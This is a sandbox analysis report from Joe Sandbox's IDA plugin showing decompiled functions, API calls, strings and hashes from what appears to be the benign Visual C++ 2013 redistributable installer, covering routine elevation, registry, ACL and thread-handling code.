Opcode Fuzzy Hash: 8f8b42e29dda8f6600a5b0f350bd291c8241cb9c1f604f79df5e603e4858d509
Instruction Fuzzy Hash: 0D216F7292010AAFDB219FE8CD809EEBBB9EB45340F14043AF601F7150D6758E448BA2

Uniqueness

Uniqueness Score: -1.00%

Function 01282A19 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E01282A19(intOrPtr _a4, short _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _t27;
				long _t34;
				void* _t38;

				_v8 = 0;
				_v16 = 0;
				_v12 = 0;
				_t34 = GetCurrentProcessId();
				_t38 = E012B1A74( &_v8, 0);
				if(_t38 >= 0) {
					_push(_t34);
					_push(_a16);
					_push(_a12);
					_push(L"burn.unelevated");
					_t38 = E012B177A( &_v16, L"%ls -%ls %ls %ls %u", _a4);
					if(_t38 >= 0) {
						_t27 = E012AFF4A(_v8, _v16, _a8,  &_v12); // executed
						_t38 = _t27;
						if(_t38 < 0) {
							E012AFA86(_t38, "Failed to launch parent process with unelevate disabled: %ls", _v8);
						}
						L7:
						if(_v12 != 0) {
							CloseHandle(_v12);
							_v12 = 0;
						}
						if(_v16 != 0) {
							E012B01E8(_v16);
						}
						if(_v8 != 0) {
							E012B01E8(_v8);
						}
						return _t38;
					}
					_push("Failed to allocate parameters for elevated process.");
					L4:
					_push(_t38);
					E012AFA86();
					goto L7;
				}
				_push("Failed to get current process path.");
				goto L4;
			}

0x01282a24
0x01282a27
0x01282a2a
0x01282a33
0x01282a3f
0x01282a43
0x01282a4c
0x01282a4d
0x01282a53
0x01282a56
0x01282a69
0x01282a70
0x01282a8e
0x01282a93
0x01282a97
0x01282aa2
0x01282aa7
0x01282aaa
0x01282aad
0x01282ab2
0x01282ab8
0x01282ab8
0x01282abe
0x01282ac3
0x01282ac3
0x01282acb
0x01282ad0
0x01282ad0
0x01282adb
0x01282adb
0x01282a72
0x01282a77
0x01282a77
0x01282a78
0x00000000
0x01282a7e
0x01282a45
0x00000000

APIs

GetCurrentProcessId.KERNEL32(00000000,?,?,?), ref: 01282A2D

Part of subcall function 012B1A74: GetModuleFileNameW.KERNEL32(01282136,?,00000104,?,00000104,?,00000000,?,?,01282136,?,00000000,?,?,?,773D9EB0), ref: 012B1A95

CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 01282AB2

Part of subcall function 012AFF4A: _memset.LIBCMT ref: 012AFF61
Part of subcall function 012AFF4A: CreateProcessW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,01282A93), ref: 012AFFB8
Part of subcall function 012AFF4A: GetLastError.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 012AFFC2
Part of subcall function 012AFF4A: CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,00000000,00000000), ref: 012B000C
Part of subcall function 012AFF4A: CloseHandle.KERNEL32(01282A93,?,?,?,?,00000000,00000000,00000000), ref: 012B0019

Strings

burn.unelevated, xrefs: 01282A56
Failed to get current process path., xrefs: 01282A45
Failed to allocate parameters for elevated process., xrefs: 01282A72
Failed to launch parent process with unelevate disabled: %ls, xrefs: 01282A9C
%ls -%ls %ls %ls %u, xrefs: 01282A5E

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: CloseHandle$Process$CreateCurrentErrorFileLastModuleName_memset
String ID: %ls -%ls %ls %ls %u$Failed to allocate parameters for elevated process.$Failed to get current process path.$Failed to launch parent process with unelevate disabled: %ls$burn.unelevated
API String ID: 1951228193-688900554
Opcode ID: 5c7b4ebafa57ee5a91306c37143582ff3f7aa26787dc5517ab7432f3d6ea872a
Instruction ID: 10da8503c2680f93d36e71f28732235146cc914cece0335a3df991eec0f65b57
Opcode Fuzzy Hash: 5c7b4ebafa57ee5a91306c37143582ff3f7aa26787dc5517ab7432f3d6ea872a
Instruction Fuzzy Hash: 12216D32D2110AFF8F22BAA59C818EDFFB8AF54390B104156E915B2161E2714B51DB90

Uniqueness

Uniqueness Score: -1.00%

Function 0128E8A3 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 54
synchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E0128E8A3(void* __ecx, void* _a4) {
				long _v8;
				int _t8;
				signed int _t10;
				signed int _t14;
				signed int _t21;

				_t21 = 0;
				_v8 = _v8 & 0;
				if(WaitForSingleObject(_a4, 0x493e0) == 0) {
					_t8 = GetExitCodeThread(_a4,  &_v8); // executed
					if(_t8 == 0) {
						_t10 = GetLastError();
						if(_t10 > 0) {
							_t10 = _t10 & 0x0000ffff | 0x80070000;
						}
						_t21 = _t10;
						if(_t21 >= 0) {
							_t21 = 0x80004005;
						}
						E012B294E(_t10, "elevation.cpp", 0x479, _t21);
						_push("Failed to get cache thread exit code.");
						goto L12;
					}
				} else {
					_t14 = GetLastError();
					if(_t14 > 0) {
						_t14 = _t14 & 0x0000ffff | 0x80070000;
					}
					_t21 = _t14;
					if(_t21 >= 0) {
						_t21 = 0x80004005;
					}
					E012B294E(_t14, "elevation.cpp", 0x474, _t21);
					_push("Failed to wait for cache thread to terminate.");
					L12:
					_push(_t21);
					E012AFA86();
				}
				return _t21;
			}

0x0128e8b0
0x0128e8b2
0x0128e8bd
0x0128e8fc
0x0128e904
0x0128e906
0x0128e90e
0x0128e915
0x0128e915
0x0128e91a
0x0128e91e
0x0128e920
0x0128e920
0x0128e930
0x0128e935
0x00000000
0x0128e935
0x0128e8bf
0x0128e8bf
0x0128e8c7
0x0128e8ce
0x0128e8ce
0x0128e8d3
0x0128e8d7
0x0128e8d9
0x0128e8d9
0x0128e8e9
0x0128e8ee
0x0128e93a
0x0128e93a
0x0128e93b
0x0128e941
0x0128e946

APIs

WaitForSingleObject.KERNEL32(?,000493E0,00000000,?,?,01291236,00000000,?,01290EE7,?,00000000,?,?,?,01281DEA,?), ref: 0128E8B5
GetLastError.KERNEL32(?,?,01291236,00000000,?,01290EE7,?,00000000,?,?,?,01281DEA,?,?), ref: 0128E8BF
GetExitCodeThread.KERNELBASE(?,?,?,?,01291236,00000000,?,01290EE7,?,00000000,?,?,?,01281DEA,?,?), ref: 0128E8FC
GetLastError.KERNEL32(?,?,01291236,00000000,?,01290EE7,?,00000000,?,?,?,01281DEA,?,?), ref: 0128E906

Strings

Failed to get cache thread exit code., xrefs: 0128E935
elevation.cpp, xrefs: 0128E8E4, 0128E92B
Failed to wait for cache thread to terminate., xrefs: 0128E8EE

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: ErrorLast$CodeExitObjectSingleThreadWait
String ID: Failed to get cache thread exit code.$Failed to wait for cache thread to terminate.$elevation.cpp
API String ID: 3686190907-1954264426
Opcode ID: 96374b284946e43a504abfbd54f4bcbeab17ac2fe81919214317ec17692f0a0c
Instruction ID: c3961d24af6327c2c21c1424a07150f3583170a11eab601d30eecc1515b2c963
Opcode Fuzzy Hash: 96374b284946e43a504abfbd54f4bcbeab17ac2fe81919214317ec17692f0a0c
Instruction Fuzzy Hash: B101B972A72227B7D7306665AC0AB6F7D589F01BB1B154238FB08FA191DAA9DD0043D4

Uniqueness

Uniqueness Score: -1.00%

Function 01291133 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 111
threadCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E01291133(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr* _a48, intOrPtr* _a52) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				void _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v88;
				void _v92;
				int _t45;
				void _t47;
				void* _t53;
				signed int _t56;
				signed int _t63;
				intOrPtr _t68;
				signed int _t69;
				signed int _t70;
				intOrPtr _t75;
				intOrPtr _t82;
				intOrPtr _t88;
				void* _t89;
				intOrPtr _t90;

				_t90 = _a24;
				_t70 = 0xa;
				_push(0xa);
				_t45 = memset( &_v92, 0, _t70 << 2);
				_t82 = _a20;
				memset( &_v52, _t45, 0 << 2);
				asm("stosd");
				asm("stosd");
				_t47 = _a4;
				_t88 = _a28;
				_v92 = _t47;
				_v52 = _t47;
				_v48 = _a8;
				_v44 = _a40;
				_v68 = _t90;
				_v40 = _a44;
				_v28 = _t90;
				_v20 = _a32;
				_v88 = _a12;
				_t75 = _a16;
				_v60 = _a32;
				_t68 = _a36;
				_v76 = _t75;
				_v72 = _t82;
				_v64 = _t88;
				_v56 = _t68;
				_v36 = _t75;
				_v32 = _t82;
				_v24 = _t88;
				_v16 = _t68;
				_t53 = CreateThread(0, 0, E01290E3A,  &_v92, 0, 0); // executed
				_t89 = _t53;
				if(_t89 != 0) {
					_t56 = E012833B1(_t75, _t82, _a8, 0x1290ee7,  &_v52,  &_v12); // executed
					_t69 = _t56;
					if(_t69 >= 0) {
						E0128E8A3(_t75, _t89); // executed
						 *_a48 = _v12;
						 *_a52 = _v8;
					} else {
						_push("Failed to pump messages in child process.");
						_push(_t69);
						E012AFA86();
					}
					CloseHandle(_t89);
				} else {
					_t63 = GetLastError();
					if(_t63 > 0) {
						_t63 = _t63 & 0x0000ffff | 0x80070000;
					}
					_t69 = _t63;
					if(_t69 >= 0) {
						_t69 = 0x80004005;
					}
					E012B294E(_t63, "elevation.cpp", 0x428, _t69);
					_push("Failed to create elevated cache thread.");
					_push(_t69);
					E012AFA86();
				}
				return _t69;
			}

0x0129113c
0x01291141
0x01291144
0x0129114c
0x0129114f
0x01291155
0x0129115d
0x0129115e
0x0129115f
0x01291162
0x01291165
0x01291168
0x0129116e
0x01291174
0x0129117a
0x0129117d
0x01291183
0x0129118a
0x01291196
0x01291199
0x0129119c
0x0129119f
0x012911a4
0x012911a7
0x012911aa
0x012911ad
0x012911b0
0x012911b3
0x012911b6
0x012911b9
0x012911bc
0x012911c2
0x012911c6
0x01291216
0x0129121b
0x0129121f
0x01291231
0x0129123c
0x01291244
0x01291221
0x01291221
0x01291226
0x01291227
0x0129122d
0x01291247
0x012911c8
0x012911c8
0x012911d0
0x012911d7
0x012911d7
0x012911dc
0x012911e0
0x012911e2
0x012911e2
0x012911f2
0x012911f7
0x012911fc
0x012911fd
0x01291203
0x01291253

APIs

CreateThread.KERNELBASE ref: 012911BC
GetLastError.KERNEL32(?,?,?,01281DEA,?,?), ref: 012911C8

Part of subcall function 0128E8A3: WaitForSingleObject.KERNEL32(?,000493E0,00000000,?,?,01291236,00000000,?,01290EE7,?,00000000,?,?,?,01281DEA,?), ref: 0128E8B5
Part of subcall function 0128E8A3: GetLastError.KERNEL32(?,?,01291236,00000000,?,01290EE7,?,00000000,?,?,?,01281DEA,?,?), ref: 0128E8BF

CloseHandle.KERNEL32(00000000,00000000,?,01290EE7,?,00000000,?,?,?,01281DEA,?,?), ref: 01291247

Strings

Failed to create elevated cache thread., xrefs: 012911F7
elevation.cpp, xrefs: 012911ED
Failed to pump messages in child process., xrefs: 01291221

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: ErrorLast$CloseCreateHandleObjectSingleThreadWait
String ID: Failed to create elevated cache thread.$Failed to pump messages in child process.$elevation.cpp
API String ID: 3606931770-4134175193
Opcode ID: 5e2f4b1894ed2272aa2afe628fb81008a20719dded4688d4f6c957040b5e37ee
Instruction ID: aec5c20990bb693f00d12c8c697fe2bd5978313cfcbd0f012e1879dea58b215c
Opcode Fuzzy Hash: 5e2f4b1894ed2272aa2afe628fb81008a20719dded4688d4f6c957040b5e37ee
Instruction Fuzzy Hash: 594109B1A11219AFCB11DF99D8859EEBBF4FF48710F10412AF905E7340D774A941CB94

Uniqueness

Uniqueness Score: -1.00%

Function 012B3BEA Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 111
stringregistryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E012B3BEA(void* __ebx, void* __edi, void* __esi, void* _a4, short* _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				int _v12;
				signed int _v16;
				WCHAR** _v20;
				int _v24;
				signed int _t51;
				signed int _t57;
				signed int _t58;
				signed int _t63;
				signed int _t67;
				signed int _t73;
				signed int _t75;
				signed int _t81;
				int _t83;
				char* _t87;
				signed int _t90;

				_t81 = 0;
				_t75 = 0;
				_v12 = 0;
				_v24 = 0;
				if(_a16 != 0) {
					_t75 = 1;
					_v16 = 1;
					if(_a16 <= 0) {
						L5:
						_t51 = E012B00D8( &_v12, _t75);
						_v8 = _t51;
						if(_t51 < 0) {
							goto L17;
						}
						_v16 = _v16 & 0x00000000;
						_t83 = _v12;
						if(_a16 <= 0) {
							L9:
							_t87 = _v12;
							goto L10;
						} else {
							goto L7;
						}
						while(1) {
							L7:
							_v20 = _a12 + _v16 * 4;
							_t63 = E0129DF26(_t83, _t75,  *((intOrPtr*)(_a12 + _v16 * 4)));
							_v8 = _t63;
							if(_t63 < 0) {
								goto L17;
							}
							lstrlenW( *_v20);
							_t67 = lstrlenW( *_v20);
							_v16 = _v16 + 1;
							_t83 = _t83 + 2 + _t67 * 2;
							if(_v16 < _a16) {
								continue;
							}
							goto L9;
						}
						goto L17;
					} else {
						goto L3;
					}
					while(1) {
						L3:
						_t73 = E012B04C2(_t75, lstrlenW( *(_a12 + _t81 * 4)) + 1,  &_v16);
						_v8 = _t73;
						if(_t73 < 0) {
							goto L17;
						}
						_t75 = _v16;
						_t81 = _t81 + 1;
						if(_t81 < _a16) {
							continue;
						}
						goto L5;
					}
					goto L17;
				} else {
					_t87 = 0x12d1058;
					L10:
					_t57 = E012B239B(_t75 + _t75, (0 << 0x00000020 | _t75) << 1,  &_v24);
					_v8 = _t57;
					if(_t57 >= 0) {
						_t58 = RegSetValueExW(_a4, _a8, 0, 7, _t87, _v24); // executed
						_t90 = _t58;
						if(_t90 != 0) {
							if(_t90 > 0) {
								_t58 = _t58 & 0x0000ffff | 0x80070000;
							}
							_v8 = _t58;
							if(_t58 >= 0) {
								_v8 = 0x80004005;
							}
							E012B294E(_t58, "regutil.cpp", 0x34e, _v8);
						}
					}
					L17:
					if(_v12 != 0) {
						E012B01E8(_v12);
					}
					return _v8;
				}
			}

0x012b3bf3
0x012b3bf5
0x012b3bf7
0x012b3bfa
0x012b3c00
0x012b3c14
0x012b3c15
0x012b3c1b
0x012b3c45
0x012b3c4a
0x012b3c4f
0x012b3c54
0x00000000
0x00000000
0x012b3c5a
0x012b3c62
0x012b3c65
0x012b3ca0
0x012b3ca0
0x00000000
0x00000000
0x00000000
0x00000000
0x012b3c67
0x012b3c67
0x012b3c72
0x012b3c77
0x012b3c7c
0x012b3c81
0x00000000
0x00000000
0x012b3c88
0x012b3c8f
0x012b3c91
0x012b3c94
0x012b3c9e
0x00000000
0x00000000
0x00000000
0x012b3c9e
0x00000000
0x00000000
0x00000000
0x00000000
0x012b3c1d
0x012b3c1d
0x012b3c2c
0x012b3c31
0x012b3c36
0x00000000
0x00000000
0x012b3c3c
0x012b3c3f
0x012b3c43
0x00000000
0x00000000
0x00000000
0x012b3c43
0x00000000
0x012b3c02
0x012b3c02
0x012b3ca3
0x012b3cb1
0x012b3cb6
0x012b3cbb
0x012b3ccb
0x012b3cd1
0x012b3cd3
0x012b3cd5
0x012b3cdc
0x012b3cdc
0x012b3ce1
0x012b3ce6
0x012b3ce8
0x012b3ce8
0x012b3cfc
0x012b3cfc
0x012b3cd3
0x012b3d01
0x012b3d08
0x012b3d0d
0x012b3d0d
0x012b3d16
0x012b3d16

APIs

lstrlenW.KERNEL32(F08B8007,057CF33B,BundleUpgradeCode,012813BB,00000000,00000000,F08B8007,057CF33B,00020006,00000000,?,?,C533012D), ref: 012B3C27
lstrlenW.KERNEL32(F08B8007,00020006,00000001,F08B8007,00020006,00000001,BundleUpgradeCode,012813BB,00000000), ref: 012B3C88
lstrlenW.KERNEL32(F08B8007), ref: 012B3C8F
RegSetValueExW.KERNELBASE(00020006,00000000,00000000,00000007,00020006,00000000,00000001,00000000,00000000,00020006,00000001,BundleUpgradeCode,012813BB,00000000), ref: 012B3CCB

Strings

regutil.cpp, xrefs: 012B3CF7
BundleUpgradeCode, xrefs: 012B3BF2

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: lstrlen$Value
String ID: BundleUpgradeCode$regutil.cpp
API String ID: 198323757-1648651458
Opcode ID: 0acbfbfeed06cb0dcb9fab1b35be8b178f2d4b4ef6f280d439b8b71f8689679c
Instruction ID: 5f74e3eff948c870ad60be9d9517e4db82cd24f599f4ff08cd871b52b72ae1b7
Opcode Fuzzy Hash: 0acbfbfeed06cb0dcb9fab1b35be8b178f2d4b4ef6f280d439b8b71f8689679c
Instruction Fuzzy Hash: C0410871E2020BEFDB11DFA9C980AEEBBB9FF04394F104066EA10A7110D775EA559B60

Uniqueness

Uniqueness Score: -1.00%

Function 012AFE13 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E012AFE13(void* _a4, signed int* _a8) {
				void* _v8;
				void _v12;
				long _v16;
				int _t21;
				signed int _t22;
				signed int _t34;

				asm("stosd");
				_t34 = 0;
				_v8 = 0;
				_v16 = 0;
				if(OpenProcessToken(_a4, 8,  &_v8) != 0) {
					_t21 = GetTokenInformation(_v8, 0x14,  &_v12, 4,  &_v16); // executed
					if(_t21 == 0) {
						_t22 = GetLastError();
						if(_t22 > 0) {
							_t22 = _t22 & 0x0000ffff | 0x80070000;
						}
						_t34 = _t22;
						if(_t34 != 0x80070057) {
							if(_t34 < 0) {
								_push(_t34);
								_push(0x3d);
								goto L14;
							}
						} else {
							 *_a8 = 0;
							_t34 = 0;
						}
					} else {
						 *_a8 = 0 | _v12 != 0x00000000;
					}
				} else {
					_t22 = GetLastError();
					if(_t22 > 0) {
						_t22 = _t22 & 0x0000ffff | 0x80070000;
					}
					_t34 = _t22;
					if(_t34 >= 0) {
						_t34 = 0x80004005;
					}
					_push(_t34);
					_push(0x29);
					L14:
					_push("procutil.cpp");
					E012B294E(_t22);
				}
				if(_v8 != 0) {
					FindCloseChangeNotification(_v8); // executed
				}
				return _t34;
			}

0x012afe21
0x012afe2d
0x012afe2f
0x012afe32
0x012afe3d
0x012afe72
0x012afe7a
0x012afe8b
0x012afe93
0x012afe9a
0x012afe9a
0x012afe9f
0x012afea7
0x012afeb4
0x012afeb6
0x012afeb7
0x00000000
0x012afeb7
0x012afea9
0x012afeac
0x012afeae
0x012afeae
0x012afe7c
0x012afe87
0x012afe87
0x012afe3f
0x012afe3f
0x012afe47
0x012afe4e
0x012afe4e
0x012afe53
0x012afe57
0x012afe59
0x012afe59
0x012afe5e
0x012afe5f
0x012afeb9
0x012afeb9
0x012afebe
0x012afebe
0x012afec6
0x012afecb
0x012afecb
0x012afed7

APIs

OpenProcessToken.ADVAPI32(?,00000008,00000000,773D9EB0,?,00000000), ref: 012AFE35
GetLastError.KERNEL32 ref: 012AFE3F
GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),?,00000004,?), ref: 012AFE72
GetLastError.KERNEL32 ref: 012AFE8B
FindCloseChangeNotification.KERNELBASE(00000000), ref: 012AFECB

Strings

procutil.cpp, xrefs: 012AFEB9

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: ErrorLastToken$ChangeCloseFindInformationNotificationOpenProcess
String ID: procutil.cpp
API String ID: 3650908616-1178289305
Opcode ID: 6335964a403c437f0ea60e7405f95fb6a2f419efd13f004715a8021985a6951f
Instruction ID: a0f36cd35480b4694682c417da228914e2a23291be24f73f6fb7935afe15513a
Opcode Fuzzy Hash: 6335964a403c437f0ea60e7405f95fb6a2f419efd13f004715a8021985a6951f
Instruction Fuzzy Hash: B7210832920216FFDB31AFA4DEC9AAEBBB4EF04B50F504439E701EB051D2788A0487D0

Uniqueness

Uniqueness Score: -1.00%

Function 01297800 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E01297800(void* __edx, intOrPtr _a4, WCHAR* _a8) {
				char _v8;
				struct _ACL _v16;
				void* __edi;
				signed int _t14;
				signed int _t21;
				signed int _t22;
				void* _t29;
				signed int _t32;

				_t29 = __edx;
				asm("stosd");
				asm("stosd");
				_t26 = 0x20000004;
				_v8 = 0;
				_t34 = _a4;
				if(_a4 == 0) {
					L11:
					_t14 = E012AFA9A(_t26, _t29, 0, _a8, 1, _t26, _v8, 0,  &_v16, 0, 3, 0x7d0); // executed
					_t32 = _t14; // executed
					SetFileAttributesW(_a8, 0x80); // executed
				} else {
					if(E01297753(0x20000004, _t34, 0x1a,  &_v8) >= 0) {
						_t21 = InitializeAcl( &_v16, 8, 2);
						__eflags = _t21;
						if(_t21 != 0) {
							_t26 = 0x20000005;
							goto L11;
						} else {
							_t22 = GetLastError();
							__eflags = _t22;
							if(_t22 > 0) {
								_t22 = _t22 & 0x0000ffff | 0x80070000;
								__eflags = _t22;
							}
							_t32 = _t22;
							__eflags = _t32;
							if(_t32 >= 0) {
								_t32 = 0x80004005;
							}
							E012B294E(_t22, "cache.cpp", 0x573, _t32);
							_push("Failed to initialize ACL.");
							goto L9;
						}
					} else {
						_push("Failed to allocate administrator SID.");
						L9:
						_push(_t32);
						E012AFA86();
					}
				}
				if(_v8 != 0) {
					E012B24F6(_v8);
				}
				return _t32;
			}

0x01297800
0x0129780d
0x0129780e
0x01297811
0x01297816
0x01297819
0x0129781c
0x0129788b
0x012978a1
0x012978ae
0x012978b0
0x0129781e
0x0129782d
0x0129783e
0x01297844
0x01297846
0x01297886
0x00000000
0x01297848
0x01297848
0x0129784e
0x01297850
0x01297857
0x01297857
0x01297857
0x0129785c
0x0129785e
0x01297860
0x01297862
0x01297862
0x01297872
0x01297877
0x00000000
0x01297877
0x0129782f
0x0129782f
0x0129787c
0x0129787c
0x0129787d
0x01297883
0x0129782d
0x012978b9
0x012978be
0x012978be
0x012978c8

APIs

InitializeAcl.ADVAPI32(00000000,00000008,00000002,0000001A,?,00000000,00000000,00000000,00000000,?,?,00000000,?), ref: 0129783E
GetLastError.KERNEL32 ref: 01297848
SetFileAttributesW.KERNELBASE(00000000,00000080,00000000,00000001,20000004,?,00000000,00000000,00000000,00000003,000007D0,00000000,00000000,00000000,00000000,?), ref: 012978B0

Strings

Failed to initialize ACL., xrefs: 01297877
Failed to allocate administrator SID., xrefs: 0129782F
cache.cpp, xrefs: 0129786D

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: AttributesErrorFileInitializeLast
String ID: Failed to allocate administrator SID.$Failed to initialize ACL.$cache.cpp
API String ID: 669721577-1117388985
Opcode ID: 08c9f17108d05a2beedc2cdcb547797d6e8509a6b55e90583426f0bf30b13d96
Instruction ID: 7f21bbf6151f79a546b7390fdb6c3d20d6926bc5873819bba62a4be389342bc7
Opcode Fuzzy Hash: 08c9f17108d05a2beedc2cdcb547797d6e8509a6b55e90583426f0bf30b13d96
Instruction Fuzzy Hash: D911E732E70205BAEF21A6AC9C49FEE7B79BB44B50F104125FB15FA180E6744A04EB90

Uniqueness

Uniqueness Score: -1.00%

Function 012B4DC3 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 012B4DD2
InterlockedIncrement.KERNEL32(012D5E68), ref: 012B4DEF
CLSIDFromProgID.OLE32(Msxml2.DOMDocument,012D5E58), ref: 012B4E0A
CLSIDFromProgID.OLE32(MSXML.DOMDocument,012D5E58), ref: 012B4E16

Strings

Msxml2.DOMDocument, xrefs: 012B4E05
MSXML.DOMDocument, xrefs: 012B4E11

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: FromProg$IncrementInitializeInterlocked
String ID: MSXML.DOMDocument$Msxml2.DOMDocument
API String ID: 2109125048-2356320334
Opcode ID: 93a966b3482d68094ff2b2c8700118658fbd314f5055a421caac328a5f0ed4c2
Instruction ID: 559e035492980ba6b7f1f7d98794156ee9562399eeb94e61b1adaf5ef53f8f78
Opcode Fuzzy Hash: 93a966b3482d68094ff2b2c8700118658fbd314f5055a421caac328a5f0ed4c2
Instruction Fuzzy Hash: A8F0A035BE92A256D725366ABCCDB473DB5A781BD1B100458EB02C200AC3A4C4928BA0

Uniqueness

Uniqueness Score: -1.00%

Function 012A5FB8 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E012A5FB8(union _LARGE_INTEGER* __edx, void* _a4, union _LARGE_INTEGER _a8, intOrPtr _a12) {
				signed int _v8;
				union _LARGE_INTEGER* _v12;
				void* _v16;
				signed int _t42;
				intOrPtr _t46;
				void* _t49;
				signed int _t52;
				int _t57;
				signed int _t58;
				void* _t62;
				intOrPtr _t69;
				intOrPtr _t73;
				union _LARGE_INTEGER* _t81;
				union _LARGE_INTEGER _t85;

				_t42 =  *0x12d4fd4; // 0x0
				_v8 = _v8 & 0x00000000;
				_t69 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t42 * 4)) + 4));
				asm("stosd");
				asm("stosd");
